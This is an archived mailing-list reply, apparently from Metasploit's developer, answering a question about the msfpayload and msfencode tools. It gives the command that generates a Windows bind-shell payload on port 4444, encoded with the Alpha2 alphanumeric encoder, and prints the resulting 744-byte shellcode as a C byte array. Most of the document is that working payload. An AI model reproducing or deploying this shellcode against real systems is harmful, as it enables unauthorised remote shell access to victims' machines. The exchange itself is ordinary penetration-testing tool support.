msfencode & msfpayload

[hdm at metasploit.com (H D Moore)]

On Tuesday 27 December 2005 05:26, RaMatkal wrote:
> need a little help with msfpayload and msfencode....is there any sort
> of documentation for these scripts?

Nothing besides the usage output in -h.

> Trying to get an alphanumeric encoded win32_bind shellcode for use with
> a perl script.....

I updated msfencode to allow environment options to be passed, this lets 
you specify the GETPCTYPE option to the Alpha2 encoder.  Use msfupdate or 
the latest snapshot to get this version of msfencode.

$ msfpayload win32_bind LPORT=4444  R | msfencode -e Alpha2 -t c \
-o win32 GETPCTYPE=seh

[*] Using Msf::Encoder::Alpha2 with final size of 744 bytes
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48\x50\x68"
"\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41\x51\x51\x44\x44"
"\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58\x56\x6a\x30\x50\x50\x54"
"\x55\x50\x50\x61\x33\x30\x31\x30\x38\x39\x49\x49\x49\x49\x49\x49"
"\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x45"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x55\x32\x41\x42\x32\x42"
"\x41\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x48\x69\x59\x6c\x50"
"\x6a\x58\x6b\x52\x6d\x4d\x38\x6b\x49\x6b\x4f\x39\x6f\x4b\x4f\x73"
"\x50\x6c\x4b\x32\x4c\x46\x44\x71\x34\x4c\x4b\x53\x75\x67\x4c\x6c"
"\x4b\x53\x4c\x66\x65\x71\x68\x76\x61\x58\x6f\x4c\x4b\x50\x4f\x42"
"\x38\x6c\x4b\x43\x6f\x71\x30\x73\x31\x7a\x4b\x30\x49\x4c\x4b\x64"
"\x74\x4e\x6b\x64\x41\x7a\x4e\x46\x51\x4f\x30\x4a\x39\x4e\x4c\x6c"
"\x44\x6b\x70\x61\x64\x56\x67\x58\x41\x79\x5a\x66\x6d\x54\x41\x5a"
"\x62\x58\x6b\x4c\x34\x57\x4b\x62\x74\x61\x34\x74\x68\x41\x65\x69"
"\x75\x4e\x6b\x53\x6f\x44\x64\x36\x61\x48\x6b\x63\x56\x6e\x6b\x76"
"\x6c\x70\x4b\x6e\x6b\x71\x4f\x37\x6c\x73\x31\x6a\x4b\x64\x43\x46"
"\x4c\x4e\x6b\x4f\x79\x52\x4c\x47\x54\x55\x4c\x72\x41\x49\x53\x30"
"\x31\x69\x4b\x73\x54\x6e\x6b\x52\x63\x50\x30\x6c\x4b\x77\x30\x66"
"\x6c\x4c\x4b\x32\x50\x67\x6c\x6e\x4d\x4c\x4b\x73\x70\x44\x48\x43"
"\x6e\x41\x78\x6e\x6e\x52\x6e\x64\x4e\x58\x6c\x70\x50\x69\x6f\x6e"
"\x36\x71\x76\x41\x43\x53\x56\x32\x48\x56\x53\x75\x62\x32\x48\x63"
"\x47\x54\x33\x37\x42\x33\x6f\x71\x44\x4b\x4f\x6e\x30\x61\x78\x38"
"\x4b\x5a\x4d\x39\x6c\x37\x4b\x32\x70\x4b\x4f\x7a\x76\x43\x6f\x6e"
"\x69\x68\x65\x33\x56\x6d\x51\x78\x6d\x67\x78\x33\x32\x33\x65\x50"
"\x6a\x63\x32\x4b\x4f\x6e\x30\x33\x58\x58\x59\x56\x69\x4a\x55\x6e"
"\x4d\x70\x57\x6b\x4f\x6a\x76\x76\x33\x30\x53\x32\x73\x30\x53\x52"
"\x73\x61\x53\x41\x43\x72\x63\x42\x73\x6b\x4f\x6e\x30\x70\x66\x31"
"\x78\x35\x41\x51\x4c\x33\x56\x62\x73\x4f\x79\x4b\x51\x6a\x35\x32"
"\x48\x6e\x44\x47\x6a\x44\x30\x69\x57\x63\x67\x6b\x4f\x4e\x36\x41"
"\x7a\x52\x30\x71\x41\x73\x65\x4b\x4f\x48\x50\x75\x38\x69\x34\x6c"
"\x6d\x64\x6e\x4d\x39\x52\x77\x49\x6f\x39\x46\x70\x53\x36\x35\x4b"
"\x4f\x6e\x30\x75\x38\x38\x65\x43\x79\x6f\x76\x43\x79\x63\x67\x39"
"\x6f\x6e\x36\x46\x30\x50\x54\x70\x54\x50\x55\x39\x6f\x6e\x30\x4c"
"\x53\x55\x38\x59\x77\x51\x69\x4b\x76\x70\x79\x31\x47\x6b\x4f\x78"
"\x56\x70\x55\x6b\x4f\x6e\x30\x33\x56\x50\x6a\x30\x64\x72\x46\x51"
"\x78\x50\x63\x30\x6d\x4e\x69\x38\x65\x52\x4a\x62\x70\x72\x79\x55"
"\x79\x4a\x6c\x4e\x69\x58\x67\x63\x5a\x50\x44\x6c\x49\x4d\x32\x64"
"\x71\x4f\x30\x58\x73\x4e\x4a\x6b\x4e\x50\x42\x64\x6d\x39\x6e\x62"
"\x62\x74\x6c\x6f\x63\x4e\x6d\x50\x7a\x74\x78\x4c\x6b\x6e\x4b\x4e"
"\x4b\x62\x48\x63\x42\x69\x6e\x4e\x53\x46\x76\x39\x6f\x31\x65\x61"
"\x54\x59\x6f\x4b\x66\x63\x6b\x73\x67\x32\x72\x56\x31\x33\x61\x56"
"\x31\x51\x7a\x34\x41\x61\x41\x63\x61\x66\x35\x63\x61\x6b\x4f\x48"
"\x50\x50\x68\x4e\x4d\x6b\x69\x75\x55\x6a\x6e\x56\x33\x6b\x4f\x69"
"\x46\x31\x7a\x49\x6f\x4b\x4f\x66\x57\x6b\x4f\x38\x50\x6e\x6b\x70"
"\x57\x4b\x4c\x4b\x33\x49\x54\x73\x54\x6b\x4f\x6a\x76\x50\x52\x49"
"\x6f\x6e\x30\x33\x58\x4a\x50\x6c\x4a\x56\x64\x73\x6f\x52\x73\x6b"
"\x4f\x38\x56\x79\x6f\x68\x50\x45";

-HD